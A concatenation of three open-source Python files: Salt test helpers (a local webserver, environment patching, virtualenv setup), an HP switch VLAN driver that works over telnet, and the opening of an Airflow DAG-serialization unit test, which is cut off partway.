class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
"'generate_random_name' will be removed after {{date}}".format(prefix),
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
    .. versionadded:: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
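# Illustrative sketch (not part of the original module): typical calls; the
# suffixes are random, the prefixes below are hypothetical.
#
#     minion_id = random_string("test-minion-", size=6)
#     lower_only = random_string("tmp-", uppercase=False, digits=False)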
class Webserver(object):
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, six.integer_types):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path "
"within {0}".format(self.root)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = "http://127.0.0.1:{0}".format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{0} within "
"{1} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, six.text_type):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
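# Illustrative sketch (not part of the original module): dedenting a
# triple-quoted block while forcing Windows-style line endings.
#
#     contents = dedent(
#         """\
#         [settings]
#         value = 1
#         """,
#         linesep="\r\n",
#     )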
class PatchedEnviron(object):
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, six.text_type):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], six.text_type):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
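# Illustrative sketch (not part of the original module): patching and cleaning up
# environment variables around a block of test code. Variable names below are
# hypothetical.
#
#     with patched_environ(__cleanup__=("LANG",), LC_ALL="C", FOO="bar"):
#         ...  # os.environ has LC_ALL/FOO set and LANG removed
#     # the original environment is restored on exit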
class VirtualEnv(object):
def __init__(self, venv_dir=None):
self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
if salt.utils.platform.is_windows():
self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
else:
self.venv_python = os.path.join(self.venv_dir, "bin", "python")
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(self.venv_dir, ignore_errors=True)
def install(self, *args, **kwargs):
return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)
def run(self, *args, **kwargs):
check = kwargs.pop("check", True)
kwargs.setdefault("cwd", self.venv_dir)
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.PIPE)
kwargs.setdefault("universal_newlines", True)
proc = subprocess.run(args, check=False, **kwargs)
ret = ProcessResult(proc.returncode, proc.stdout, proc.stderr, proc.args)
log.debug(ret)
if check is True:
proc.check_returncode()
return ret
def _get_real_python(self):
"""
        The virtualenv creation is proxied through this function mostly because,
        under Windows, we can't seem to properly create a virtualenv off of
        another virtualenv (we can on Linux), and also because we really don't
        want to test virtualenv creation off of another virtualenv; we want a
        virtualenv created from the original python.
        Also, on Windows, we must point to the virtualenv binary outside the
        existing virtualenv because it will fail otherwise.
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
self.venv_dir, python=self._get_real_python()
)
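# Illustrative sketch (not part of the original module): creating a throw-away
# virtualenv, installing a package into it and running a command with its
# interpreter. The package name is a hypothetical example.
#
#     with VirtualEnv() as venv:
#         venv.install("pep8")
#         ret = venv.run(venv.venv_python, "-c", "import pep8; print(pep8.__version__)")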
@contextmanager
def change_cwd(path):
"""
Context manager helper to change CWD for a with code block and restore
it at the end
"""
old_cwd = os.getcwd()
try:
os.chdir(path)
# Do stuff
yield
finally:
# Restore Old CWD
os.chdir(old_cwd)
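# Illustrative sketch (not part of the original module): temporarily running code
# from inside a scratch directory.
#
#     with change_cwd(RUNTIME_VARS.TMP):
#         subprocess.check_call([sys.executable, "-c", "import os; print(os.getcwd())"])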
|
hpswitch.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
# What HP switches is this for? The configuration syntax does not appear
# like it would work for Procurves. - stroucki 20100224
import os
import sys
import pexpect
import datetime
import thread
import threading
import logging
from hwswitchinterface import HwSwitchInterface
class HwHPSwitch(HwSwitchInterface):
def __init__(self, config, host=None):
self.config = config
self.host = host
self.verbose = False
self.log = logging.getLogger(os.path.basename(__file__))
def setVerbose(self, verbose):
self.verbose = verbose
def __login(self):
switchIp = "telnet " + self.host['hw_name']
child = pexpect.spawn(switchIp)
opt = child.expect(['Name:', 'password:', pexpect.EOF, pexpect.TIMEOUT])
child.setecho(False)
if opt == 0:
child.sendline(self.host['hw_userid'])
# Be Verbose and print everything
if self.verbose:
child.logfile = sys.stdout
child.sendline(self.host['hw_password'])
i=child.expect(['Main#', pexpect.EOF, pexpect.TIMEOUT])
if i == 2:
mesg = "Login to %s failed\n" % (self.host['hw_name'])
self.log.error(mesg)
exit(1)
return child
def __getPrsLabel(self):
dadate = datetime.datetime.now().strftime("%Y%m%d-%H%M-%S")
return "ZONI_" + dadate
def __saveConfig(self, child):
#child.logfile = sys.stdout
cmd = "save"
child.sendline(cmd)
opt = child.expect(["Confirm(.*)", "No save(.*)", pexpect.EOF, pexpect.TIMEOUT])
if opt == 0:
print "saving to flash"
child.sendline("y\n")
if opt == 1:
print "no save needed"
child.sendline('exit')
child.terminate()
def enableHostPort(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + " /ena/apply "
child.sendline(cmd)
# testing this thread... Looks like this works ...
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
def disableHostPort(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + " /dis/apply "
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
def removeVlan(self, num):
print "removing vlan"
# Check for important vlans
child = self.__login()
cmd = "/cfg / l2 / vlan " + num + " / del / apply"
child.sendline(cmd)
opt = child.expect(["Confirm(.*)", pexpect.EOF, pexpect.TIMEOUT])
if opt == 0:
child.sendline("y\n")
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
def addVlanToTrunk(self, vlan):
print "NOT IMPLEMENTED"
print "No trunks to test @ MIMOS"
def createVlansThread(self, vlan, switch,host):
mesg = "Creating vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.createVlan(vlan)
self.addVlanToTrunk(vlan);
thread.exit()
def createVlans(self, vlan, switchlist, query):
for switch in switchlist:
#print "working on switch ", switch
#self.host = query.getSwitchInfo(switch)
#thread.start_new_thread(self.createVlansThread, (vlan, switch, self.host))
mesg = "Creating vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.host = query.getSwitchInfo(switch)
self.createVlan(vlan)
self.addVlanToTrunk(vlan);
def removeVlans(self, vlan, switchlist, query):
for switch in switchlist:
mesg = "Deleting vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.host = query.getSwitchInfo(switch)
self.removeVlan(vlan)
def createVlan(self, val):
vlanname = False
if ":" in val:
num = int(val.split(":")[0])
vlanname = val.split(":")[1]
else:
vlanname = self.__getPrsLabel()
num = int(val)
if num > 4095 or num < 0:
mesg = "Vlan out of range. Must be < %s" % (self.config['vlan_max'])
self.log.error(mesg)
exit(1)
child = self.__login()
cmd = "/cfg / l2 / vlan " + str(num) + " / ena/ apply"
child.sendline(cmd)
cmd = "name " + str(vlanname) + " / apply"
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
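    # Illustrative sketch (not part of the original file): the vlan argument may be
    # either a bare number or a "number:name" pair; the names below are hypothetical.
    #
    #     switch.createVlan("100")            # auto-generated ZONI_<timestamp> name
    #     switch.createVlan("200:ZONI_LAB")   # explicit vlan name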
# Raw Switch commands. DEBUG ONLY!, Doesn't work!
def sendSwitchCommand(self, cmds):
if len(cmds) > 0:
child = self.__login()
child.logfile = sys.stdout
for cmd in cmds.split(";"):
child.sendline(cmd)
try:
i=child.expect(['console','sw', 'Name:', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
i=child.expect(['console','sw', 'Name:', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
except pexpect.EOF:
print "EOF", i
#child.sendline()
except pexpect.TIMEOUT:
print "TIMEOUT", i
#child.interact(escape_character='\x1d', input_filter=None, output_filter=None)
child.terminate()
#print "before", child.before
#print "after", child.after
def addNodeToVlan(self, vlan):
child = self.__login()
cmd = "/cfg/l2/vlan " + str(vlan) + " /add " + str(self.host['hw_port']) + " /apply "
child.sendline(cmd)
opt = child.expect(['(.*)#','(.*)needs to be enabled', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
if opt == 1:
print "VLAN Created, Enabling..." + str(vlan)
cmd = "/cfg/l2/vlan " + str(vlan) + " /ena/apply "
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
def removeNodeFromVlan(self, vlan):
child = self.__login()
cmd = "/cfg/l2/vlan " + str(vlan) + " /rem " + str(self.host['hw_port']) + "/apply"
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
def setNativeVlan(self, vlan):
child = self.__login()
#child.logfile = sys.stdout
cmd = "/cfg/port " + str(self.host['hw_port']) + "/pvid " + str(vlan) + "/apply"
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
    # HP switches allow more free control. For example, if you set a port to a native vlan
    # that doesn't exist, HP switches will happily create it for you.
    # However, if you delete a vlan that exists on many ports, it will still happily delete
    # the vlan, forcing all the other ports to default to some other native vlan. Need
    # to make sure we check before blasting vlans.
# Restore Native Vlan.
def restoreNativeVlan(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + "/pvid 1/apply"
child.sendline(cmd)
        threading.Thread(target=self.__saveConfig, args=(child,)).start()
# Setup the switch for node allocation
def allocateNode(self):
pass
# Remove all vlans from the interface
def removeAllVlans(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + "/tag d/apply"
#child.logfile = sys.stdout
child.sendline(cmd)
def showInterfaceConfig(self):
print "\n---------------" + self.host['hw_make'] + "---------------------"
print "SWITCH - " + self.host['hw_name'] + "/" + str(self.host['hw_port'])
print "NODE- " + self.host['location']
print "------------------------------------\n"
        # using run and parsing output. Still have issues with an "rt" after the command. Fix later
#val = pexpect.run("telnet sw0-r4r1e1", withexitstatus=False, timeout=2, events=({'(?i)password:': "admin\r\n", "Main#": "info\r\n", "Info(.*)" : "port\r\n"})) #, "Info(.*)" : "exit\n"}))
# Just print everything for now, fix when back in the US
#print val
child = self.__login()
cmd = "/info/port " + str(self.host['hw_port'])
child.sendline(cmd)
child.logfile = sys.stdout
__opt = child.expect(['Info(.*)', pexpect.EOF, pexpect.TIMEOUT])
# this needs to be removed or rewritten
def interactiveSwitchConfig(self):
switchIp = "telnet " + self.host['hw_name']
child = pexpect.spawn(switchIp)
child.setecho(False)
#child.expect('Name:')
#child.sendline(self.host['hw_userid'])
#i=child.expect(['test','password:','Password:', pexpect.EOF, pexpect.TIMEOUT])
#child.logfile = sys.stdout
child.sendline(self.host['hw_password'])
child.interact(escape_character='\x1d', input_filter=None, output_filter=None)
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
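# Illustrative sketch (not part of the original tests): collecting only the core
# example DAGs instead of the default provider globs.
#
#     dags = collect_dags("airflow/example_dags")
#     assert "simple_dag" in dags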
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
